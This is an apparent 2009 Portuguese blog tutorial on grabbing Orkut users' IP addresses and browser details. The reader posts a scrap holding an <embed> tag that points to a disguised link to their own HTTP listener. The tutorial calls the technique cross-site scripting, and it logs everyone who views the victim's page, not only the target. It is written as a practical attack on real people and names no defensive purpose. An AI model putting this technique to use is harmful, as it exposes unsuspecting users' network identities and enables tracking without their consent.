Capturando um IP com XSS, descobrir, pegar ip pelo orkut via Cross Site Scripting

Publicado: junho 20, 2009 em ataques, normal
Tags:, , , , , , , ,

O XSS, ou Cross Site Scripting é um método onde você insere seu script em um site, forun, etc, de modo que quando a pessoa ler o seu “post” o seu script será executado

automaticamente.

Vamos um em exemplo prático no Orkut.

1º) Abra seu insecuritynet e vá em: > Computador local > IP Local

Copie seu IP

1

Para copiar clique com o botão direito no mouse selecione “Marcar”, selecione o IP e tecle

enter. Não é Ctrl C

2º) Agora vá em > Web > Ferramentas Online

Abra o site e vá em “Esconda seu Link”

2

3º) Cole o seu este link http://seuip e crie novo link

Obs: “seuip” é o ip que você pegou em “Computador local > IP Local”

3

Clique em “Criar Link” 4

4

4º) Agora envie um scrap para seu amigo com este código:

<embed src=”link_que_vc_criou”></embed>

Obs: “link_que_vc_criou” é o link que você criou em “Esconda seu Link”

5

5º) Agora vá em seu insecuritynet na opção Ferramentas > HTTP em escuta.

6

6º) Agora peça para seu amigo ler o scrap, quando ele ler os dados IP e navegador dele

seram enviados para sua escuta de HTTP.

Tambem serão enviados os dados de qualquer pessoa que visualizar a pagina de recados de

seu amigo.

7

PARA AS PESSOAS QUE FALAVAM QUE PEGAR IP PELO ORKUT É MENTIRA… pois ai está.

Esse ataque é chamado é de Cross Site Scripting

comentários

Deixe uma resposta

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s